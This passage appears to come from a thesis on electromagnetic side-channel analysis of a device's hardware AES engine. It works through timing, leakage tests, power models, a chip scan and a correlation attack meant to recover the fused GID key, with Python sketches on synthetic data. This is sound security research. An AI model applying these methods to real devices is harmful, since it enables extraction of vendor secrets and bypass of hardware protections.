Finally, cmd_measure is used when performing EM measurements. The function first disables the (cooperative) scheduler (lines 380-381) to ensure the function does not get interrupted during execution. Then, a loop is entered, which serves a custom console accessible over UART. This measure mode console listens for custom commands which invoke the AES engine in specific modes according to the supplied parameters. Using the custom software AES-128 implementation as pseudorandom number generator (PRNG), input blocks are generated which are then sent to the AES engine. This way, a user specified number of batch encryptions is performed before the next command is received. Due to the patch applied in Section 4.3.3, the GPIO is driven high each time the hardware AES engine starts and low each time it finishes. The function can be exited by pressing the volume-up button, which re-enables the scheduler and returns to the boot loader recovery console.

4.3.5 Helper Functions

Several helper functions are implemented to aid development. For example, lines 856-877 provide wrapper functions for invoking the AES engine, lines 878-957 provide helper functions used within the program and lines 958-1011 provide standard library functions (as already mentioned in Section 4.2). Lastly, the T-Table based AES-128, which is used as PRNG during the measurements, is implemented in lines 1012-1065.

5 AES Side-channel Analysis

After creating the tools required to perform EM side-channel measurements as described in the previous chapters, the next step is to gather as much information about the target as possible. This chapter deals with analysing the AES engine and recovering the GID key through performing a CPA utilizing EM measurements during decryption.

5.1 AES Engine Modes

By reverse engineering the boot loader and using publicly available (reverse engineered) resources[tea], we learn that the AES engine can be used for encryption and decryption. It is possible to select either the hardware fused device specific UID key, the hardware fused device model specific GID key or to supply a custom key. Furthermore, the hardware engine supports encrypting/decrypting multiple blocks in 128-bit, 192-bit and 256-bit AES CBC mode with the previously mentioned key options.

5.2 AES Timing

To get an idea of how much time it takes for the AES engine to perform a single decryption, we measure the time between a rising and falling edge of the GPIO signal, which roughly marks the start and end of the decryption as described in Section 4.3.3. Although the signal does not only cover the AES itself, because CPU instructions and Input/Output (I/O) transfers to and from the engine take time themselves, it indicates a time frame in which the AES runs.

Figure 5.1 shows multiple decryption traces in CBC mode with different numbers of blocks being decrypted. The GPIO signal is colored in blue, while the EM signal is colored in red. It can be seen that the time between the rising edge and falling edge increases, although not proportionally to the number of blocks being decrypted. Furthermore, there are some patterns in the signal with certain parts always staying the same, while other parts differ. By plotting all decryption traces of 1 to 16 blocks on top of each other as seen in Figure 5.2, we can see that the first three peaks are exactly the same for all plots (ignoring noise and jitter) and only after the third peak the traces differ. This suggests some kind of preamble like latency, I/O transfer or core initialization during the first 800ns. Furthermore, the peaks at 1000ns and 1800ns in Figure 5.1a are possibly start/stop signals, as the distance between them increases with the number of blocks, while the distance between the rising/falling edge and those peaks stays roughly the same.

To further analyse this, two green lines were added to the plots in Figure 5.1. The upper green line represents the duration of the GPIO signal staying above 1V and the lower green line represents the distance between the hypothetical start/stop signals. Figure 5.3 lists the durations of the GPIO and EM signals. The first column shows the number of blocks being decrypted, while the next two columns show the time of the GPIO signal being above 1V (upper green line in Figure 5.1) and the hypothetical AES duration (lower green line in Figure 5.1), each divided by the number of blocks being decrypted. Next, the same timings without the division by the number of decrypted blocks follow. Finally, the last column shows the difference between the GPIO time and the hypothetical decryption time, essentially showing the overhead induced by additional preceding and subsequent operations.

The time per block in both the second and third column of Figure 5.3 decreases with the number of blocks being decrypted, suggesting that this is not a very reliable approach, as one would expect a similar time per block after dividing by the number of decrypted blocks. Yet this still allows making some assumptions about the underlying implementation. One is that, because the hypothetical decryption time per block (third column) decreases more slowly with the number of blocks being decrypted, the overhead presumably averages out when decrypting more blocks, and thus the last row of the third column gives the best approximation so far, which is less than 124ns per block. Another can be seen in rows 2, 3 and 4 of the fourth column, showing that the total duration of the GPIO signal being high does not change despite the fact that different numbers of blocks are being decrypted. The hypothetical decryption time in rows 2, 3 and 4 of the fifth column, on the other hand, does increase (keeping in mind the noise) and the difference between GPIO and peak stays roughly the same (rows 2, 3 and 4 in column 6). This effect might be caused by the structure described in Section 4.3.3, because if the decryption ends right after the load in line 270 of Listing 4.3, the CPU needs to execute 8 more instructions, taking up several clock cycles, before the GPIO goes low. Also, the increase in duration in rows 1 and 2 of the fifth column supports the hypothesis of a decryption taking around 120ns or less.

Summing up the analysis of this section, we assume that a single AES decryption takes less than 120ns and that the previously described peaks are start/stop indicators for the AES engine. During these tests it was noticeable that when decrypting fewer than 3 blocks, the falling edge jitters a lot, while decrypting more blocks seems to yield more time constant traces. This is likely due to I/O transfers and synchronizations between the AES engine and the CPU, since the GPIO edge is driven by the CPU rather than the AES engine. Further information about the implementation cannot be recovered by solely looking at the traces. Subsequent analysis (Section 5.5) reveals that the signal seen in between the assumed start and stop peak is not the AES itself, but rather I/O transfers.
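The duration of the GPIO signal staying above 1V, and the resulting time per block, can be extracted from a sampled trace as sketched below. This is a minimal illustration under assumptions: the function name `time_above_threshold`, the synthetic trace, its 1.8V high level and the block count are hypothetical; only the 1V threshold and the 40GS/s sampling rate are taken from the text.

```python
def time_above_threshold(samples, sample_period_ns, threshold=1.0):
    """Return (start_ns, duration_ns) of the first pulse above `threshold`.

    Returns None if the signal never rises above the threshold.
    """
    start = None
    for index, value in enumerate(samples):
        if start is None and value > threshold:
            start = index  # rising edge
        elif start is not None and value <= threshold:
            # falling edge: the pulse is complete
            return start * sample_period_ns, (index - start) * sample_period_ns
    if start is None:
        return None
    # The pulse is still high at the end of the capture.
    return start * sample_period_ns, (len(samples) - start) * sample_period_ns


SAMPLE_PERIOD_NS = 1 / 40  # 40 GS/s, as in Section 3.2

# Synthetic GPIO trace: 100 samples low, 400 samples high, 100 samples low.
gpio = [0.0] * 100 + [1.8] * 400 + [0.0] * 100
start_ns, duration_ns = time_above_threshold(gpio, SAMPLE_PERIOD_NS)
blocks = 8  # hypothetical number of decrypted blocks
print(start_ns, duration_ns, duration_ns / blocks)
```

Dividing the duration by the number of blocks gives the per-block figures discussed above, including the constant overhead that only averages out for larger block counts.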

5.3 Initial Probe Placement

In the previous section we discussed that decrypting multiple blocks in CBC mode makes the traces jitter less, which makes alignment easier. Because of this, an input length of 8 blocks was chosen for further analysis. By manually moving the EM probe around the SoC, a position for further analysis was chosen where the signal showed a promising pattern, that is, a position where the number of peaks correlates with the number of blocks being decrypted and the peaks yield a strong signal.

5.4 Non-Specific t-test

The first step when assessing leakage is to perform the Non-Specific t-test (see Section 2.2.1) in order to check whether the traces of a set of fixed-input AES invocations can be distinguished from a set of random-input invocations. For this test it is not necessary to know the AES key, as decrypting the same input always produces the same intermediate states. If the implementation leaks, the fixed-input decryptions should yield similar EM traces (ignoring the noise), which should be distinguishable from random-input decryption traces. To get a better estimate of whether key extraction is possible, this test is performed using the targeted GID key. The measurement setup is as follows: First, the payload (as discussed in Section 4.3) is deployed and executed on the target device. Afterwards, measure mode (see Section 4.3.4) is entered, so that the device listens for commands over UART. Then, two seeds of 16 bytes each and an integer specifying the number of sequential decryptions are sent to the device. The seeds are fed into a PRNG, which is constructed by encrypting a block with a software AES-128 using the key 0102030405060708090a0b0c0d0e0f, then using the output both as PRNG output and as input for the next encryption. The first seed is called encryption_seed. Its PRNG output is used to get random blocks for AES decryption. The second seed is called selection_seed. It determines whether the next invocation of the AES engine uses the input generated by the encryption_seed or the fixed input (see Listing B.4 lines 472-476). This is repeated as many times as the previously sent counter specifies. Afterwards, the device listens for a new command. After one iteration, the program on the host sends another command, repeating the procedure until (in this case) 10'000'000 traces are recorded. Subsequently, the traces are aligned and filtered using the method described in Section 6.1.
Since the traces are noisy and jittery, the main goal here was to align the traces at the start signal as well as possible. Figure 5.4a shows a plot of 500 aligned traces. As seen in Figure 5.4b, the first-order t-test shows significant leakage beyond the threshold value of 4.5/-4.5 (indicated by two red lines) throughout the whole trace. This suggests that an EM side-channel attack might be possible. Figure 5.4d shows the t-value plotted on top of a trace. The highest t-value is 23274 at sample 46203, which is 11607 samples after the assumed start signal (at sample 34596). This corresponds to about 290ns, as the oscilloscope has a sampling rate of 40GS/s. The value of 290ns does not match the assumed value of 120ns from Section 5.2, but assuming the highest t-value is caused by the AES output I/O transfer, it is likely that (at least some) AES decryptions take place right before the peak.
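The fixed-vs-random comparison described above can be sketched as follows. This is a minimal illustration using Welch's t-statistic on synthetic data, not the evaluation code used for the measurements; the function name welch_t, the synthetic trace generator and the trace counts are assumptions made for this example only.

```python
import math
import random
from statistics import fmean, variance


def welch_t(fixed, rand):
    """Welch's t-statistic per sample point for two sets of equal-length traces."""
    n_f, n_r = len(fixed), len(rand)
    t_values = []
    # zip(*traces) iterates over sample points (columns) instead of traces (rows)
    for col_f, col_r in zip(zip(*fixed), zip(*rand)):
        mean_f, mean_r = fmean(col_f), fmean(col_r)
        var_f, var_r = variance(col_f, mean_f), variance(col_r, mean_r)
        t_values.append((mean_f - mean_r) / math.sqrt(var_f / n_f + var_r / n_r))
    return t_values


# Synthetic stand-in for measured traces: only sample 2 depends on the input class.
rng = random.Random(1)


def synthetic_trace(offset):
    return [rng.gauss(0, 1), rng.gauss(0, 1), rng.gauss(offset, 1), rng.gauss(0, 1)]


fixed_set = [synthetic_trace(1.0) for _ in range(2000)]
random_set = [synthetic_trace(0.0) for _ in range(2000)]

t = welch_t(fixed_set, random_set)
# Sample points whose |t| exceeds the 4.5 threshold are flagged as leaking.
leaking = [i for i, value in enumerate(t) if abs(value) > 4.5]
print(leaking)
```

With real measurements, fixed_set and random_set would hold the aligned traces of the two input classes as selected by the selection_seed.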

5.5 Signal-to-Noise Ratio

After having discovered leakage in the previous section, it is useful to know how much signal can be found in the traces. Therefore, 10'000'000 traces were recorded similarly to what is described in Section 5.4, but this time only random blocks were decrypted using a known key. One recorded trace covers the decryption of 8 blocks in CBC-AES-256 mode. The power models used here are the 8-bit hamming weight of the sixth ciphertext byte and the 8-bit hamming weight of the sixth plaintext byte (other bytes of the ciphertext/plaintext yield similar results). The SNR traces for both models for each of the 8 blocks are visualized in a single plot in Figure 5.5a. The peaks between sample 10'000 and 20'000 correspond to the power model HW(ciphertext[5]) and the peaks after sample 40'000 correspond to HW(plaintext[5]). Ciphertext and plaintext SNR of the same block are plotted using the same color. The SNRs seen in Figure 5.5 are assumed to visualize I/O transfers to and from the AES engine, rather than the internal state of the AES engine. There are several indicators that support this hypothesis. One is that all ciphertext SNRs can be observed at the beginning of the trace, while the plaintexts are seen much later. Figure 5.5b shows a close-up of the ciphertext SNRs. We can see that the individual blocks are transferred sequentially in order from the first to the last block. Measuring the distance between the (arbitrarily picked) third peak of each block shows that they are almost exactly 200 samples apart, which corresponds to 5ns required to transfer one block to the AES engine. This is far below the assumed 120ns from Section 5.2 required for one decryption. Figure 5.5d shows the SNR plotted on top of a trace. We can see that the peaks of the SNR coincide with the bigger peaks of the EM signal, which can be explained by I/O transfers being much more dominant (in terms of EM emanation) than data being processed by a single hardware module.
By examining Figure 5.5c we can see that the plaintext blocks are transferred back in the same order they were sent to the AES engine; however, there is a delay between some blocks. The first plaintext block is received 31286 samples (782.15ns) after the last ciphertext block was sent (the distance between the highest peak of ciphertext block 8 at sample 16063 and the highest peak of plaintext block 1 at sample 47349 in Figure 5.5a). Then, the SNR color switches 4 times every 200 samples (5ns) in Figure 5.5c, which means a plaintext block is transferred every 5ns. Afterwards, there is a delay of 5800 samples (145ns) before the next two plaintext blocks are transferred. Then, there is again a delay and again two blocks are transferred.

It is assumed that the pattern of first 4 blocks, then repeatedly a delay followed by 2 blocks, continues when more blocks are decrypted. Figure 5.1e seems to support that; however, the hypothesis was not investigated further. At this point the hypothesis from Section 5.2, that the peak between sample 30'000 and sample 40'000 (Figure 5.5d) is a start signal, no longer seems to hold, as the peak lies in the middle of the interval in which at least 4 decryptions take place. It is possible that the first peak in the example EM trace at sample 6500 (Figure 5.5d) indicates the start of an I/O transfer and the peak at sample 22'000 indicates the stop of an I/O transfer, with the peak around sample 15'000 being the I/O transfer of the ciphertext itself. Thus, the peak at sample 22'000 might be some kind of AES start signal; however, this cannot be proven at this point. What is certain is that at least 4 decryptions have to take place between sample 16063 (highest peak of the last ciphertext block in Figure 5.5d) and sample 47948 (first peak of the fourth plaintext block in Figure 5.5d). Also, because large EM signal peaks are I/O transfers, further measurements should increase the resolution for small voltage changes by allowing very large peaks, which probably correspond to I/O transfers, to exceed the captured voltage range of the oscilloscope, and should focus on the time frame ranging from sample 22'000 to sample 46'000. Further power models were tested to check whether a signal can be seen from the AES engine itself; however, none of them yields an SNR above the threshold of noise. Performing another measurement with the previously described voltage range and time frame settings did not yield any significant results either. A list of models which were tested with various combinations of input/output bytes can be found in Figure 5.7. The notation is explained in Figure 5.6.
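The SNR computation used in this section can be illustrated with a minimal sketch. It assumes the common definition of SNR as the variance of the per-class mean traces divided by the mean of the per-class variances, with classes given by the 8-bit hamming weight of one byte. The function names hw8 and snr and the synthetic data are assumptions for this example; for simplicity, the class means are not weighted by class size.

```python
import random
from collections import defaultdict
from statistics import fmean, pvariance


def hw8(value):
    """8-bit hamming weight."""
    return bin(value & 0xFF).count("1")


def snr(traces, labels):
    """Per-sample SNR: variance of class means divided by mean of class variances."""
    groups = defaultdict(list)
    for trace, label in zip(traces, labels):
        groups[label].append(trace)
    result = []
    for s in range(len(traces[0])):
        means, variances = [], []
        for members in groups.values():
            column = [trace[s] for trace in members]
            if len(column) < 2:
                continue  # a class with a single trace has no usable variance
            means.append(fmean(column))
            variances.append(pvariance(column))
        result.append(pvariance(means) / fmean(variances))
    return result


# Synthetic stand-in: sample 0 is pure noise, sample 1 leaks HW(byte) plus noise.
rng = random.Random(7)
data = [rng.randrange(256) for _ in range(3000)]
traces = [[rng.gauss(0, 1), hw8(b) + rng.gauss(0, 1)] for b in data]
labels = [hw8(b) for b in data]

snr_trace = snr(traces, labels)
print(snr_trace)
```

For a byte-wise hamming weight model this requires only 9 groups of traces, which is why the approach is cheap for 8-bit models but becomes costly for larger ones.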

Notation                      Explanation
$K_i$                         Key byte index $i$
$K_r$                         Full $r$-th round key
$C_i$                         Ciphertext byte index $i$
$P_i$                         Plaintext byte index $i$
$B_i$                         Both: plaintext and ciphertext byte index $i$ were tested
$S_{r,i}$                     State byte index $i$ in AES round $r$
$S_r$                         Full state in AES round $r$
$HW_n(\cdot)$                 $n$-bit hamming weight
$V(\cdot)$                    Byte value ranging from 0 to 255
$Z(\cdot)$                    Zero value model (0 if input is zero else 1)
$T'_i(\cdot)$                 32-bit output of $i$-th inverse AES T-Table
$S(\cdot)$ / $S'(\cdot)$      AES (inverse) S-Box
$P(\cdot)$ / $P'(\cdot)$      AES (inverse) permutation
$MC'(\cdot)$                  AES inverse MixColumns

Figure 5.6: Power model notation

$V(B_i)$
$HW_8(B_i)$
$HW_{32}(B_i | B_{i+1} | B_{i+2} | B_{i+3})$
$V(S'(C_i \oplus K_i))$
$HW_8(S'(C_i \oplus K_i))$
$Z(C_i \oplus K_i)$
$HW_{32}(T'_0(C_4 \oplus K_4))$
$HW_{32}(T'_1(C_{13} \oplus K_{13}))$
$HW_{32}(T'_2(C_{10} \oplus K_{10}))$
$HW_{32}(T'_3(C_7 \oplus K_7))$
$HW_{32}(T'_0(C_4 \oplus K_4) \oplus T'_1(C_{13} \oplus K_{13}))$
$HW_{32}(T'_0(C_4 \oplus K_4) \oplus T'_1(C_{13} \oplus K_{13}) \oplus T'_2(C_{10} \oplus K_{10}))$
$HW_{32}(T'_0(C_4 \oplus K_4) \oplus T'_1(C_{13} \oplus K_{13}) \oplus T'_2(C_{10} \oplus K_{10}) \oplus T'_3(C_7 \oplus K_7))$
$HW_{32}(T'_0(C_4 \oplus K_4) \oplus (C_0 | C_1 | C_2 | C_3))$
$HW_{32}(T'_0(C_4 \oplus K_4) \oplus (C_0 | C_1 | C_2 | C_3) \oplus (K_0 | K_1 | K_2 | K_3))$
$V(S_{1,i})$
$HW_8(S_{1,i})$
$HW_{32}(S_{1,i} | S_{1,i+1} | S_{1,i+2} | S_{1,i+3})$
$V(P'(S'(C_i \oplus K_i)) \oplus K_{i+16})$
$HW_8(P'(S'(C_i \oplus K_i)) \oplus K_{i+16})$

Figure 5.7: Tested power models

5.6 AES CPA Power Models

Using SNR as a method to test power models poses a limitation, as it might, depending on the power model, consume too much memory to compute efficiently. The next step in leakage assessment is to search for a suitable power model. Without further information about the implementation, which is not available to us, the best approach is educated guessing and efficient testing. Choosing CPA over SNR as a tool for further analysis allows efficient testing of 128-bit hamming weight models, since CPA computes a single hypothetical trace rather than creating 129 groups of traces. For further analysis, another measurement of 51'000'000 traces (after filtering) was performed with focus on the time frame ranging from sample 22'000 to sample 46'000 (Figure 5.5d) with a higher voltage sensitivity, as described in Section 5.5. A list of additional power models tested for 8-block CBC-AES-256 decryption using correlation can be found in Figure 5.8. Again, the notation from Figure 5.6 is used.

$HW_{128}(S_r)$
$HW_{128}(S'(P'(S_r)))$
$HW_{128}(S'(P'(S_r)) \oplus K_r)$
$HW_{128}(MC'(S'(P'(S_r)) \oplus K_r))$
$HW_{128}(S_r \oplus S_{r+1})$
$HW_{128}(P'(S_r) \oplus P'(S_{r+1}))$
$HW_{128}(S'(P'(S_r)) \oplus S'(P'(S_{r+1})))$
$HW_{128}(S'(P'(S_r)) \oplus K_r \oplus S'(P'(S_{r+1})) \oplus K_{r+1})$
$HW_{128}(MC'(S'(P'(S_r)) \oplus K_r) \oplus MC'(S'(P'(S_{r+1})) \oplus K_{r+1}))$

Figure 5.8: Additional large power models
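To illustrate why CPA scales to 128-bit models, the following sketch correlates a single hypothetical value per trace with every sample point, without grouping traces into 129 classes. It is a plain-Python illustration on synthetic data; the function name pearson_per_sample, the leakage scaling of 0.1 and the trace count are assumptions for this example and do not reflect the OpenCL implementation used in this thesis.

```python
import math
import random


def pearson_per_sample(hypothesis, traces):
    """Pearson correlation between one hypothetical value per trace and each sample point."""
    n = len(traces)
    mean_h = sum(hypothesis) / n
    dev_h = [h - mean_h for h in hypothesis]
    ss_h = sum(d * d for d in dev_h)
    corr = []
    for column in zip(*traces):  # one column per sample point
        mean_t = sum(column) / n
        dev_t = [v - mean_t for v in column]
        ss_t = sum(d * d for d in dev_t)
        cov = sum(a * b for a, b in zip(dev_h, dev_t))
        corr.append(cov / math.sqrt(ss_h * ss_t))
    return corr


# Synthetic stand-in: random 128-bit values play the role of S_r xor S_{r+1}.
rng = random.Random(3)
states = [rng.getrandbits(128) for _ in range(2000)]
hyp = [bin(s).count("1") for s in states]  # 128-bit hamming weight
# Sample 0 is pure noise, sample 1 leaks a scaled hamming weight plus noise.
traces = [[rng.gauss(0, 1), 0.1 * h + rng.gauss(0, 1)] for h in hyp]

corr = pearson_per_sample(hyp, traces)
print(corr)
```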

5.7 Leaking Power Model

Evaluating the results from the previous section shows that the model $HW_{128}(S_r \oplus S_{r+1})$ exhibits significant leakage. Although AES-256 decryption is used, the power model is easier to describe in terms of encryption: it is the 128-bit hamming weight of the state in a round after sbox and permutation xored with the very same state in the next round. For example, when attacking the first round of encryption, the model is $HW_{128}((P \oplus K) \oplus P(S(P \oplus K)))$. The correlation of the leaking model is computed for rounds 0-14 and plotted in Figure 5.9, with round 0 corresponding to the state after initial key addition. Listing B.5 shows the source code of the OpenCL power model kernel function. The round is selected by modifying the G_SELECTOR_ROUND macro in line 4. Figure 5.9a shows the decryption of the second block. With the exception of round 0, the power model yields a visible peak for every round.

Even though not all peaks rise significantly above the threshold of noise, the fact that the peaks of the individual rounds are located close to each other, in the correct order and at equal distances, is a strong indicator that the peaks are a real signal rather than just noise. The highest peak of each round is 200 samples apart from the highest peak of the next round. Thus, we can conclude that a single round takes 5ns. Therefore, 14 rounds of AES take 70ns. However, AES-256 decryption of a single block takes 95ns. This value is obtained by taking the distance between the first red peak at sample 804 and the first green peak at sample 4604 in Figure 5.9d, which is 3800 samples. These peaks correspond to the first round of the second block (see Figure 5.9a) and the first round of the third block (see Figure 5.9b), respectively. Assuming a round is processed in a single clock cycle, this corresponds to a clock speed of 200MHz. The nature of the leaking power model and the fact that none of the other tested power models yields correlation above the threshold of noise support the hypothesis of one round being processed in a single clock cycle (thus resulting in a 200MHz clock speed). However, it is not known whether the clock for the AES engine actually runs at that speed. Furthermore, Figure 5.9d shows that the individual blocks are processed immediately after one another. Taking the time between round 14 of the second block at sample 3407 and round 1 of the third block at sample 4607 yields a time interval of 30ns. Technically, however, the decryption of block 3 starts one cycle earlier, because the round 1 peak represents the state in the first round xored with the state after the initial key addition. Therefore, the time interval between two blocks is 25ns, rather than 30ns. This confirms the hypothesis from Section 5.5 that the SNR peaks seen in Figure 5.5 are caused by I/O transfers.
Figure 5.9e shows the correlation of every round of blocks 2 to 6 on top of a trace. The EM signal in the middle of the trace is the same peak that was previously believed to be the start signal in Figure 5.1. It is the same peak as the one between sample 30'000 and sample 40'000 in Figure 5.5d. Since the decryption takes place in parallel to other processes like I/O transfers or DMA start/stop signals, the decryption of some blocks is drowned out by noise, as seen at block 4 in Figure 5.9c and Figure 5.9e. Therefore, it makes sense to decrypt and measure multiple blocks and to focus on blocks which are not overlaid by noise.
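The timing figures of this section follow directly from the sample positions and the oscilloscope's sampling rate of 40GS/s. The arithmetic can be reproduced with the short sketch below; the helper name samples_to_ns and the variable names are chosen for this example only.

```python
SAMPLE_RATE_GSPS = 40  # oscilloscope sampling rate in samples per nanosecond


def samples_to_ns(samples, rate=SAMPLE_RATE_GSPS):
    """Convert a distance in samples to a duration in nanoseconds."""
    return samples / rate


round_ns = samples_to_ns(200)                # distance between round peaks
all_rounds_ns = 14 * round_ns                # 14 rounds of AES-256
block_ns = samples_to_ns(4604 - 804)         # round 1 of block 2 to round 1 of block 3
gap_ns = samples_to_ns(4607 - 3407)          # round 14 of block 2 to round 1 of block 3
between_blocks_ns = gap_ns - round_ns        # block 3 starts one cycle earlier
clock_mhz = 1000 / round_ns                  # assuming one round per clock cycle

print(round_ns, all_rounds_ns, block_ns, gap_ns, between_blocks_ns, clock_mhz)
```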

5.8 Evaluating Smaller Power Models

The advantage of testing 128-bit power models is that it is more likely to find a signal which stands out from noise. Assuming the full 128-bit state is written to a register at once, the 128-bit hamming distance power model will stand out much more than smaller power models like 64-bit, 32-bit, 16-bit or 8-bit hamming distance models. Even though this is a good method to learn about the implementation, such a leaking power model, once found, is not practical for mounting an attack. Testing smaller hamming models shows that leakage can still be detected, although it rapidly decreases as the hamming model becomes smaller. Figure 5.10 shows the correlation for rounds 1-14 of the second block computed over 80'000'000 traces (after filtering). Even when using the 8-bit hamming model, a peak among noise for rounds 4, 6 and 9 can be seen at their corresponding positions in Figure 5.10d. It should be noted that for recovering the key with a bruteforce attack, only the 8-bit hamming model is suitable. The reason for this is that, due to the nature of the power model which will be used for the attack (the hamming distance between the plaintext and the state in the last decryption round after permutation and sbox), only the 8-bit model causes each bit of the guessed key to influence each bit of the state. Thus, only the correct key will correctly model the power consumption, while all wrong candidates will yield a random distribution in case of the 8-bit model. When using the 16-bit hamming weight, not all key bits influence the state (no MixColumns operation), which can cause a hypothetical trace to be constructed with a partially correct key. This results in the signal of the correct candidate being overlaid with noise from the other, incorrect candidate. In addition, the fact that the 16-bit hamming weight has more hypothetical states (17 rather than 9) will decrease the efficiency rather than being helpful in this case.

5.9 Full Chip Scan

More traces can be recorded in order to overcome the noise and get better correlation results. However, prior to that it makes sense to find an optimal position for the EM probe on the SoC, since previous measurements were performed by arbitrarily placing the probe on the SoC. After finding a leaking power model and analysing the implementation of the AES engine, it is possible to search for the best probe position using a more systematic approach. In order to do so, a scan of the full SoC is performed. This is done by setting the oscilloscope's time frame to where the AES is expected to be executing and dividing the SoC into a grid of 25x25 positions, where at each position 150'000 traces with 40'000 points of 4-block CBC-AES-256 decryption are recorded. These choices were made so that the chip is covered as precisely as possible (which results in moving the probe by approximately half its diameter) and enough samples are recorded to have several blocks in case some blocks overlap with I/O transfers, while keeping the data at a reasonable size to be able to store and process the traces (about 6TB in this case). After recording the traces, correlation is performed on each of the 25x25 positions. Then, a 3D heatmap over the chip is created by plotting the highest value of each correlation trace. The procedure is performed for each of the 4 blocks and shown in Figure 5.11. In case a strong signal stands out, neighbouring positions are expected to have a similar correlation value at a nearby point in time.

Each of the 4 plots in Figure 5.11 shows two noticeable peaks located at the same positions. The first peak is at the coordinates (X=3,Y=14) and the second is at (X=20,Y=23). The peaks barely stand out from noise, and they do not stand out significantly even when plotting the correlation over time at those hotspots. Nevertheless, it is unlikely to get 4 similar plots from random noise alone. Thus, even though the data is insufficient to prove that these hotspots are the best positions, they are still considered the best candidates for further analysis. Because of limited storage (which is the biggest problem) and limited computing power, this approach is not suitable for more precise analysis. Thus, one of the hotspots is picked for further extensive measurements at that position. In this case (X=3,Y=14) was arbitrarily chosen. The exact probe positioning can be seen in Figure 5.12.
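The argument that hotspots appearing at the same coordinates in all four heatmaps are unlikely to be noise can be made concrete with a small sketch. It assumes that each heatmap is a 25x25 grid holding the highest correlation value per probe position and simply intersects the strongest positions of all blocks. The function names, the choice of k=2 and the synthetic grids are assumptions for this example, not the analysis code used here.

```python
import random

GRID = 25  # the SoC is divided into 25x25 probe positions


def top_positions(heatmap, k):
    """Return the (x, y) coordinates of the k largest values in heatmap[y][x]."""
    cells = [(value, x, y) for y, row in enumerate(heatmap) for x, value in enumerate(row)]
    cells.sort(reverse=True)
    return {(x, y) for _, x, y in cells[:k]}


def common_hotspots(heatmaps, k=2):
    """Positions that are among the k strongest in every heatmap."""
    return set.intersection(*(top_positions(h, k) for h in heatmaps))


# Synthetic stand-in: noise everywhere, two positions that stand out in each block.
rng = random.Random(0)
heatmaps = []
for _ in range(4):  # one heatmap per decrypted block
    grid = [[rng.uniform(0.0, 1.0) for _ in range(GRID)] for _ in range(GRID)]
    grid[14][3] = 2.0   # (X=3, Y=14)
    grid[23][20] = 2.0  # (X=20, Y=23)
    heatmaps.append(grid)

hotspots = common_hotspots(heatmaps)
print(sorted(hotspots))
```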

5.10 AES CPA Attack

After having found a leaking model and a good position on the SoC, it is possible to perform an attack in order to retrieve the GID key. For this, the setup is adjusted as follows: First, the probe is positioned on the SoC as described in Section 5.9. Then, the time frame and voltage resolution are adjusted according to previous analysis. Next, 200'000'000 traces are recorded with a known key and 600'000'000 traces are recorded using the target key. In both cases 8 blocks of random data are decrypted in CBC mode. Figure 6.1f shows 500 example traces (after alignment and filtering) corresponding to decryption with the target key.

5.10.1 CPA With Known Key

First, we inspect the traces corresponding to decryptions with a known key. For this purpose, the power model is adjusted as follows: For the first 16 bytes of the key, the AES decryption output (plaintext with the CBC xor step reversed) is xored with the first round key (identical to the first 16 bytes of the master key) and then put through the S-Box. The output of the S-Box is xored with the decryption output at the index where the permutation layer puts the byte. Finally, the 8-bit hamming weight of the resulting value is used as the hypothetical power value. For the final 16 bytes of the key (identical to the second round key), the same power model is used one round later.
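The byte-wise model described above can be sketched as follows. The sketch generates the AES S-Box from its definition and computes the hypothetical power value for one key byte guess. It assumes the standard column-major AES state layout and the forward ShiftRows mapping for "the index where the permutation layer puts the byte"; this index convention and the function names are assumptions for this example and may differ from the kernel in Listing B.5.

```python
def build_sbox():
    """Generate the AES S-Box (inverse in GF(2^8) followed by the affine map)."""
    exp, log = [0] * 255, [0] * 256
    x = 1
    for i in range(255):
        exp[i], log[x] = x, i
        # multiply x by the generator 3: x * 3 = x xor xtime(x)
        xtime = ((x << 1) & 0xFF) ^ (0x1B if x & 0x80 else 0)
        x ^= xtime
    sbox = []
    for a in range(256):
        inv = 0 if a == 0 else exp[(255 - log[a]) % 255]
        s = inv
        for shift in range(1, 5):
            s ^= ((inv << shift) | (inv >> (8 - shift))) & 0xFF
        sbox.append(s ^ 0x63)
    return sbox


SBOX = build_sbox()


def shift_rows_dest(i):
    """Index to which ShiftRows moves byte i (assumed column-major state)."""
    row, col = i % 4, i // 4
    return 4 * ((col - row) % 4) + row


def hyp_power(dec_out, key_guess, i):
    """HW8 of S(dec_out[i] xor key_guess) xor dec_out at the permuted index."""
    s = SBOX[dec_out[i] ^ key_guess]
    return bin(s ^ dec_out[shift_rows_dest(i)]).count("1")


# Example: hypothetical power value for byte index 1 with key guess 0x01.
block = bytes(range(16))
print(hyp_power(block, 0x01, 1))
```

Evaluating hyp_power for all 256 guesses of one key byte over all recorded decryption outputs yields the 256 hypothetical traces per byte that are then correlated with the measurements.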

5.10.1.1 Correlation Analysis

Using this power model, the correlation is computed for all 32 bytes of the known key. The majority of bytes yield a correlation with a clearly distinguishable peak, as seen in Figure 5.13a. Some bytes, however, yield a correlation trace in which no peak stands out significantly from noise, as seen in Figure 5.13b.

Inspecting each of the 16 correlation traces for the first round shows that the best absolute correlation for every key byte is at the exact same point in time. In this case, the best leakage is the positive peak at sample 3101, as seen in Figure 5.13a. To visualize this, Figure 5.14 shows just the highest absolute correlation value of each trace at its corresponding point in time. Most dots are located almost exactly at sample 3101. Just a few dots have a maximum absolute correlation at a different point in time. Further analysis of the bytes which do not have their highest absolute correlation at sample 3101 shows that these bytes do not have a clear peak at all, as seen in Figure 5.13b. This observation gives two important insights. First, it supports the hypothesis of a round-based AES implementation as discussed in Section 5.7, where a 128-bit register is updated each round, which means that each round takes one clock cycle. This is because if a 128-bit register is updated in every round, then all 16 bytes leak at the exact same time during this register update, which is indeed the observed case. If, on the other hand, smaller registers were used and updated sequentially, the highest correlation values of the individual bytes would not be located at the exact same point in time, but would be shifted against each other. The second insight is a direct implication of the first one: it makes sense to focus on one single sample, or rather a small window to compensate for errors, when recovering the key bytes of one single round.

5.10.1.2 Known Key Attack Simulation

